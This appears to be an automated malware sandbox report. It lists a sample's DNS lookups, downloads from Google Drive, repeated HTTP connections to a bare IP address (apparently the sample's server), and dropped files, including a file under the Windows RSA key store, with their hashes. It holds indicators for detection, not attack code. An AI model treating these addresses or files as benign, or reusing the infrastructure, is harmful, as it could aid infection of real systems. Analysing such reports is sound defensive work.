US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 215.191.184.137.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 233.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 203.142.123.92.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp

Files

memory/4968-0-0x00007FF8D4B53000-0x00007FF8D4B55000-memory.dmp

memory/4968-1-0x0000024475B00000-0x0000024475B22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ikteime5.w4o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4968-11-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4968-12-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4968-14-0x00007FF8D4B53000-0x00007FF8D4B55000-memory.dmp

memory/4968-15-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4968-17-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4188-18-0x0000000002250000-0x0000000002286000-memory.dmp

memory/4188-19-0x0000000004D10000-0x0000000005338000-memory.dmp

memory/4188-20-0x0000000004BC0000-0x0000000004BE2000-memory.dmp

memory/4188-22-0x0000000005430000-0x0000000005496000-memory.dmp

memory/4188-21-0x0000000004C60000-0x0000000004CC6000-memory.dmp

memory/4188-32-0x00000000054A0000-0x00000000057F4000-memory.dmp

memory/4968-33-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4188-34-0x0000000005A70000-0x0000000005A8E000-memory.dmp

memory/4188-35-0x0000000006010000-0x000000000605C000-memory.dmp

memory/4188-36-0x0000000007410000-0x0000000007A8A000-memory.dmp

memory/4188-37-0x0000000005FB0000-0x0000000005FCA000-memory.dmp

memory/4188-38-0x0000000006E30000-0x0000000006EC6000-memory.dmp

memory/4188-39-0x00000000060D0000-0x00000000060F2000-memory.dmp

memory/4188-40-0x0000000008040000-0x00000000085E4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Rougemontite.Syn

MD5 7df7a44a36f0666d01596fdfb4e93c5c
SHA1 c465aa950ffbfefe481851e0715d3b144585667e
SHA256 2ad4cb2a56b1f5150c2806ccb0f2527c61f6d2946751cad910a33e60313862b5
SHA512 7756fae223ac9ba367ef85efc829c5b734076202530f9492ee723f6c1b31387d922b166d1596a77c80b2472a352691f0b109999b48d9ffea0a90f888c7077e26

memory/4188-42-0x00000000085F0000-0x000000000C3A6000-memory.dmp

memory/4968-43-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/2480-44-0x0000000001030000-0x0000000004DE6000-memory.dmp

memory/2480-58-0x0000000001030000-0x0000000004DE6000-memory.dmp

memory/4968-61-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\0f5007522459c86e95ffcc62f32308f1_c186ecc3-67e4-4d2b-8682-b6c322da87aa

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\0f5007522459c86e95ffcc62f32308f1_c186ecc3-67e4-4d2b-8682-b6c322da87aa

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b